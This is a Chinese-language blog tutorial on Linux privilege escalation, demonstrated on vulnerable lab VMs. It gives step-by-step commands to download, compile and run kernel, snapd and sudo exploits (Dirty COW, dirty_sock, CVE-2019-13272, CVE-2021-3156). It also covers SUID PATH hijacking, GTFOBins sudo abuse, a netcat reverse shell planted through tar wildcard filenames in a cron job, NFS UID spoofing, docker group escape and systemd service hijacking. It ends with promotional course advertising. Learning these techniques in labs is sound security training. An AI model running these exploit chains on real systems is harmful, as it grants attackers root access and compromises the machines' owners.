干货：Linux之常用提权方法总结

干货 | Linux之常用提权方法总结

简介

进行linux提权前最好对Linux信息收集、渗透测试常用命令有所了解。

常用命令汇总

这里简单在提一下常用命令

靶机环境

下面的提权,我主要会使用两个靶机

• OWASP_Broken_Web_Apps_VM_1.2 (默认用户名账户：root密码:owaspbwa) 下载地址:https://sourceforge.net/projects/owaspbwa/files/
• lin.security_v1.0 (默认用户名账户：bob密码:secret)下载地址: https://www.vulnhub.com/entry/linsecurity-1,244/

如果感觉官网下载慢,可以从我提供的百度网盘下载
链接：https://pan.baidu.com/s/1uq-wQUIsEQm76M-LyEwVIQ
提取码：panx

这里OWASP_Broken_Web_Apps_VM_1.2 环境默认使用的是root用户,所以我给他添加了一个新用户,方便我们提权测试!

# 添加用户名为xunmi的新用户,并且将默认命令行设置为bash(这个比较好用,默认是sh) useradd -s /bin/bash -m xunmi # 给xunmi用户设置密码(推荐设置一个简单点的,方便我们自己使用) passwd xunmi # 创建xunmi家目录 mkdir /home/xunmi # 将权限移交给xunmi chown -R xunmi:xunmi /home/xunmi

security_v1.0 环境的默认键盘和网络环境都有点问题,需要我们配置一下(因为配置这些需要高级权限,所以会先提权处理一下)

# 这是一条提权命令,之后会详解这里因为会用到root权限,就先使用一下! sudo awk 'BEGIN {system("/bin/bash")}' # 修改键盘布局 # 默认\符号是shift+2 vim /etc/default/keyboard # 将XKBLAYOUT改的值为us # 保存好退出后(:wq)重新此服务,如下命令 setupcon # 配置网卡 vim /etc/netplan/50-cloud-init.yaml # 将enp0s3改为ens33 # 同样配置退出后重启服务即可 netplan apply # 切回我们常规用户,方便之后提权测试 su bob

Linux提权方法

提权指的就是从低权限用户变为高权限用户的一种方法。所以我们至少要保证已经拿到目标机器的低权限用户了。Linux漏洞信息集合: (https://github.com/SecWiki/linux-kernel-exploits)

Linux提权漏洞利用

脏牛(Dirty COW)CVE-2016-5195漏洞

主要影响范围:Linux 内核 => 2.6.22 ~ 3.9 (x86/x64)
漏洞检测:uname -a查看linux内核是否在此范围内下载地址: https://github.com/FireFart/dirtycow
使用靶机: OWASP_Broken_Web_Apps_VM_1.2
首先我们将攻击载荷下载到目标机器

# https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c,这是攻击载荷的文件,如果将文件传入目标机器就靠你自己了!我用的shell(FinalShell)终端有非常方便的拖拽导入。 # 将c进行编译(正常情况下,输入gcc dirty.c -o dirty即可,但这里需要填写两个动态链接库pthread和lcrypt) gcc -pthread dirty.c -o dirty -lcrypt # 给生成的文件赋予权限 chmod 777 dirty # 运行文件(后面跟着想要设置的密码!这个密码会替换目标root用户的密码。) ./dirty 密码 # 切换用户,切换进入的用户虽然不叫root,但有所有root用的权限(可以输入id查看信息) su - # 搞完事情后记得把密码文件恢复 mv /tmp/passwd.bak /etc/passwd

CVE-2019-7304漏洞

这是一个Linux包管理器snap本地提权漏洞,主要针对一些乌班图系统

Ubuntu版本范围：
Ubuntu 18.10
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 LTS
snap版本范围：
2.28 < snapd < 2.37

漏洞检测:snap --version查看当前版本是否在指定范围内攻击载荷: https://github.com/initstring/dirty_sock
(v1: 将目标秘钥发送到指定邮箱, v2: 创建一个用户名密码都为dirty_sock的有所有sudo权限的用户!)

# 这里我们使用v2版本 # 先赋权 chmod 777 dirty_sockv2.py # 在使用 python3 dirty_sockv2.py # 如下图成功后可以登陆到dirty_sock用户(密码也是dirty_sock) su - dirty_sock # 登陆成功后即可使用sudo命令已管理员身份执行任何命令了,比如如下命令可以直接切换到root用户! sudo su

CVE-2019-13272漏洞

主要影响范围:Linux 内核 => 4.10 ~ 5.1.17
攻击载荷里描述主要针对下列版本系统可以进行提权(我当前并没有下列系统的靶机所以没有复现此漏洞)

• Ubuntu 16.04.5 kernel 4.15.0-29-generic
• Ubuntu 18.04.1 kernel 4.15.0-20-generic
• Ubuntu 19.04 kernel 5.0.0-15-generic
• Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
• Linux Mint 19 kernel 4.15.0-20-generic
• Xubuntu 16.04.4 kernel 4.13.0-36-generic
• ElementaryOS 0.4.1 4.8.0-52-generic
• Backbox 6 kernel 4.18.0-21-generic
• Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
• Kali kernel 4.19.0-kali5-amd64
• Redcore 1806 (LXQT) kernel 4.16.16-redcore
• MX 18.3 kernel 4.19.37-2~mx17+1
• RHEL 8.0 kernel 4.18.0-80.el8.x86_64
• Debian 9.4.0 kernel 4.9.0-6-amd64
• Debian 10.0.0 kernel 4.19.0-5-amd64
• Devuan 2.0.0 kernel 4.9.0-6-amd64
• SparkyLinux 5.8 kernel 4.19.0-5-amd64
• Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
• Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
• Mageia 6 kernel 4.9.35-desktop-1.mga6
• Antergos 18.7 kernel 4.17.6-1-ARCH

攻击载荷: https://www.exploit-db.com/exploits/47163下载地址: https://www.exploit-db.com/download/47163

# 下载攻击载荷 wget https://www.exploit-db.com/download/47163 -O exp.c # 将目标编译 gcc exp.c -o exp # 启动提权 ./exp

CVE-2021-3156漏洞

主要影响范围:sudo 1.8.2~1.8.31p2、sudo 1.9.0~1.9.5p1
漏洞检测：sudoedit -s /报错信息sudoedit开头则可能存在此风险

如果已usage开头,则无风险。除了这两种情况,还有可能因为没有sudo使用权限导致的报错!下载地址: https://github.com/blasty/CVE-2021-3156.git
此漏洞使用条件还是比较苛刻的,首先我们需要用户有一定的sudo权限sudo -l

其次Linux自带的一个安全机制对此漏洞的利用也有很大的影响,此安全机制导致服务每次启动的时候都会在不同的内存区域中

而此漏洞需要知道我们sudo服务的内存偏移量才能对齐进行进行漏洞利用。

下面这个漏洞利用脚本可以帮我们使用穷举法(暴力破解)去找sudo所在位置。下载地址: https://github.com/lockedbyte/CVE-Exploits

此脚本使用也比较简单,但需要注意的是,这个脚本应该是在Windows环境下写的,我上传到Linux中时候出现了一些编码问题,提示/bin/bash^M: bad interpreter: No such file or directory,如果你也有类似问题,需要先改变一下编码

# 首先vim打开我们需要执行的文件 vim exp.sh # 编辑文件，执行 :set ff=unix # 退出编辑 :wq # 运行脚本 ./exp.sh

然后这个脚本就会开始穷举攻击了。

Linux环境变量

# 查看所有环境变量 export # 查看环境变量路径 echo$PATH

我们在linux中使用的命令就是一个个可执行文件

linux系统就是通过这些环境变量所指定的路径来快速定位到我们想要执行的命令。

比如我想执行一个ls命令,其实我们执行的是/bin/ls这个可执行文件,而系统就是靠环境变量中我们设置的路径/bin中找到的ls并执行这个执行的优先级是按从前到后的,如上图,假如在/usr/local/sbin路径中找到ls,则就会使用/usr/local/sbin路径中的ls而不是/bin中的。而我们主要就是需要利用这个特性,来完成提权。

# 临时添加环境变量(从头添加) export PATH=路径:$PATH # 添加到尾部 export PATH=$PATH:路径

文件特殊权限利用

我在Linux渗透测试常用命令中提到过linux有几种特殊权限

这里主要会用到属主运行setuid和属组运行setgid

如果我们知道已属主运行或者属组运行的可执行文件属主或属组为管理员权限

并且会调用那些命令的话,即可尝试对齐命令做替换处理来达到提权目的。假设现在有这样一个文件,

#include<unistd.h> #include<stdlib.h> voidmain(){<!- - --> setuid(0); setgid(0); system("ps"); }

我们将其编译成可执行文件,并且将其赋予属主执行权限!

gcc ps.c -o 测试 chmod 4777 测试 ls -l

上述条件只是我搭建的一个测试条件,正常情况下如果碰到类似情况,可以尝试这种执行方法

# 查找上述这种文件的方法 # 从根目录(/),查找属主(4000)或属组(2000)或同时有属主和属组(6000)执行权限的文件(f),并且自动删除所有报错(2>/dev/null, 2是所有的错误信息,/dev/null是linux中的一个虚无的文件) find / -perm -4000 -type f 2>/dev/null # 详细信息版本 find / -perm -4000 -type f -exec ls -al {<!- - -->} \; 2>/dev/null

从上面的属主执行文件中,我们可以看到目标会调用ps命令,这时候我们可以利用环境变量将目标想要执行的文件替换成我们想要执行的命令

# 创建一个ps文件准备替换(如果当前用户没有自己的文件夹,可以在/tmp这个临时文件夹中创建) echo"/bin/bash" > ps # 给我们创建的额ps文件赋权 chmod 777 ps # 添加环境变量(当前我的ps在/home/bob目录中!) export PATH=/home/bob:$PATH

suid命令汇总网站(gtfobins): https://gtfobins.github.io/#+suid

除了上述这种利用外,我们还能找一些系统命令进行利用,比如如下我们在找属主执行文件的时候找到了taskset命令,这时候我们就可以利用此命令的漏洞进行提权taskset命令提权: https://gtfobins.github.io/gtfobins/taskset/

查看隐藏文件

# Linux隐藏文件会使用.开头,所以使用".*"即可匹配隐藏文件 find / -name ".*" -type f 2>/dev/null # 查看详细信息版本,并且只查看/home路径中的隐藏文件 find / -name ".*" -type f -path "/home/*" -exec ls -al {<!- - -->} \; 2>/dev/null # 或 find /home -name ".*" -type f -exec ls -al {<!- - -->} \; 2>/dev/null

sudo权限滥用

滥用sudo的先决条件是你知道当前登陆用户的明文密码!在Linux中很多命令权限只有管理员才能使用,普通用户如果想在不登录管理员账号的情况下执行一些管理员命令就需要用到sudo这个权限,如果有所有sudo权限的话,就和Linux超级管理员root用户基本一致了。使用sudo -l命令即可查看当前用户有哪些权限,下列两种分别是有所有sudo权限和没有任何sudo权限的提示。如果你拿到的用户发现有所有的sudo权限,那么恭喜,宝才,你捡到鬼了。输入sudo su命令即可获得到root用户,不过正常状态下,我应该不会运气这么好。
大多数情况下,我们可能会碰到下列类似的情况,会告诉我们使用当前用户有哪些权限可以使用sudo命令执行。如果你又捡到鬼了,发现有/bin/bash或者/bin/sh之类的命令,也可直接提权。除了上面捡到鬼的情况外,sudo大概率一般会赋权给用户find权限方便用户查找,或ftp,git之类的命令。提权命令汇总网站(gtfobins): https://gtfobins.github.io/#+sudo
比如我们利用find提权

# https://gtfobins.github.io/gtfobins/find/#sudo # 在当前目录下(.)执行(-exec)/bin/bash,执行完成后退出(-quit),;代表执行另外一条命令,\是;的转义字符 sudo find . -exec /bin/bash \; -quit # socat也可以,剩下的就不演示了 # stdin 是标准输入 sudo socat stdin exec:/bin/sh

定时任务提权

一般我们拿到低权限用户都会看看对方有没有定时任务,如下所示

# 查看当前系统中有哪些定时任务 cat /etc/crontab # 查看文件类型(如果是脚本最好,shell script) file 定时任务执行文件 # 查看当前文件权限 ls -l 定时任务执行文件

首先我们可以看到这个系统中有一个每分钟都会执行一次的定时任务,并且这个定时任务是一个脚本,但是我们却只有这个脚本的可读权限
这个定时任务主要执行的是将家目录中所有的子目录压缩备份/etc/backups目录中

将参数写在文件名中

利用此漏洞前我们需要知道Linux的一个特性,如果我们有一个名字为--参数的文件,会和原本的参数产生冲突!如下图,我创建了一个文件名为--help的文件,但我使用cat --help却无法查看此文件,会触发帮助命令。这里我们使用msf生成一个本地反弹命令

# 此命令会生成一个反弹shell命令 msfvenom -p cmd/unix/reverse_netcat lhost=127.0.0.1 lport=8888 R # 不执行上述命令也可以,直接用我生成的 mkfifo /tmp/mpuo; nc 127.0.0.1 8888 0</tmp/mpuo | /bin/sh >/tmp/mpuo 2>&1; rm /tmp/mpuo

上述的定时任务中,我们发现定期备份的文件中,有我们当前用户的目录

# 每次执行的定时任务 for i in $(ls /home); docd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done # 其中这段表示将/home中所有文件夹名赋值给i,下面我们用bob举例,假如现在i被赋值为bob了 for i in $(ls /home) # 然后会cd到bob的家目录中 cd /home/bob # 下面就是我们需要利用的命令,将鲍勃家目录中所有的文件进行备份! /bin/tar -zcf /etc/backups/home-bob.tgz *

漏洞利用:

# 把上述生成的本地反弹shell命令写入脚本 echo"mkfifo /tmp/mpuo; nc 127.0.0.1 8888 0</tmp/mpuo | /bin/sh >/tmp/mpuo 2>&1; rm /tmp/mpuo" > shell.sh # 执行一个脚本 echo > "--checkpoint=1" # 执行的脚本目标(执行shell脚本,我们上面生成的反弹命令) echo > "--checkpoint-action=exec=sh shell.sh" # 建立上述命令后,再次备份打包时候打包命令便会变为如下所示 # tar -zcf /etc/backups/home-bob.tgz --checkpoint=1 --checkpoint-action=exec=sh shell.sh shell.sh # 监听我们反弹的接口 nc -lvvp 8888

网络文件系统低权限访问

网络文件系统，英文Network File System(NFS)它允许网络中的计算机之间通过TCP/IP网络共享资源

在NFS的应用中，本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件，就像访问本地文件一样

类似Windows中的网络功能,此功能默认开放在2049端口

我们可以使用下列nmap命令查找目标机器

nmap -sS -T4 -p - 目标地址

# 安装nfs服务 apt-get install nfs-common # 查看读取权限 showmount -e 目标地址 # 挂载本地 mount 目标地址:远程要挂载的目录 本地目录

挂载完成后,我们就可以看到目标文件,但我们对此目录是没有写入操作权限的,因为我的超级管理用户是被压缩成了匿名用户。

越权写入

如果我们先在对方主机写入文件,可以通过伪造对方主机的用户来实现,首先根据上述我们映射文件时候获取到的信息是,目标映射文件是属于peter用户,并且这个用户的uid为1001,gid为1005。我们在本地也创建一个类似的用户

# 创建名为peter,组号为1005的组(一般用户组和用户是一个名字) groupadd -g 1005 peter # 创建peter用户并且将其添加入peter组 adduser peter -uid 1001 -gid 1005 # 查看peter信息 cat /etc/passwd |grep peter

之后即可在目标机器中写入文件

Docker提权

前提条件:

1. 目标机器属于docker组
2. 目标机器最好能和外网连接(或者你能想目标机器上传文件也可以尝试,不过这需要有一定的docker使用基础)

满足上述条件后,只需输入docker run -v /:/hostOS -i -t chrisfosterelli/rootplease即可尝试提权

Systemd配置提权

Systemd简介

Linux在之前的很多版本中,服务都是和init进程有关的,启动时候我们需要输入如下命令

# 假设这里启动apache2服务 sudo /etc/init.d/apache2 start # 或者 service apache2 start

init进程因为在设计时使用的是串行启动,并且只负责启动服务脚本,所以导致比较低效。而Systemd就是为了解决这些问题从而存在的。
不少新系统中会将Systemd设置为系统第一进程(PID=1),而且Systemd并不是一个命令,而是一组管理系统的命令,其中systemctl是Systemd的主命令

# 重启系统 $ sudo systemctl reboot # 关闭系统，切断电源 $ sudo systemctl poweroff # 查看启动耗时 $ systemd-analyze

Systemd提权

systemd提权其实和我上述提到的文件特殊权限提权有一些类似

首先我们还是需要找到一个可以用超级管理员省份执行的目标,我这里使用/lib/systemd/system下的debug.service

因为我们当前peter用户是对齐有可写权限的

查看此服务配置可以看出,当前服务会已超级管理员(root)用户省份执行一个文件

那我们只要把目标文件改成我们想要目标执行的命令,并且重启服务即可!

# 先回到用户家目录 cd ~ # 转义\n之类的字符(-e),将/bin/bash复制到/home/peter/管理员控制台,并且赋权为6755 # 将其保存在`管理员控制台.sh`文件中,并且赋给执行权限 echo -e '#!/bin/bash \ncp /bin/bash /home/peter/管理员控制台 \nchmod 6755 /home/peter/管理员控制台' > /home/peter/管理员控制台.sh && chmod +x 管理员控制台.sh # 修改debug配置文件 vim /lib/systemd/system/debug.service # ExecStart=赋值为 /home/peter/管理员控制台.sh

不过之后重启服务就需要其他手段了,是在不行就等着管理员那天重启系统吧!

重启后我们便能看到的如下所示的管理员控制台

这时候并不是直接执行管理员控制台即可获得root用户权限,而是需要我们执行./管理员控制台 -p才能获取root权限!

学习资源

如果你是也准备转行学习网络安全（黑客）或者正在学习，这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品，旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力，熟练掌握基础攻防到深度对抗。

读者福利 |CSDN大礼包：《网络安全入门&进阶学习资源包》免费分享（安全链接，放心点击）

一、知识库价值

深度： 本知识库超越常规工具手册，深入剖析攻击技术的底层原理与高级防御策略，并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等，提供了独到的技术视角和实战验证过的对抗方案。

广度： 面向企业安全建设的核心场景（渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营），本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点，是应对复杂攻防挑战的实用指南。

实战性： 知识库内容源于真实攻防对抗和大型演练实践，通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

二、部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式，既夯实基础技能，更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式，既夯实基础技能，更深入高阶对抗技术。

内容组织紧密结合攻防场景，辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合，是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

三、适合学习的人群

‌基础适配人群‌

1. ‌零基础转型者‌：适合计算机零基础但愿意系统学习的人群，资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌；
2. ‌开发/运维人员‌：具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能，实现职业方向拓展‌或者转行就业；
3. ‌应届毕业生‌：计算机相关专业学生可通过资料构建完整的网络安全知识体系，缩短企业用人适应期‌；

‌能力提升适配‌

1、‌技术爱好者‌：适合对攻防技术有强烈兴趣，希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌；

2、安全从业者‌：帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌；

3、‌合规需求者‌：包含等保规范、安全策略制定等内容，适合需要应对合规审计的企业人员‌；

因篇幅有限，仅展示部分资料，完整版的网络安全学习资料已经上传CSDN，朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

‌；

因篇幅有限，仅展示部分资料，完整版的网络安全学习资料已经上传CSDN，朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

文章来自网上，侵权请联系博主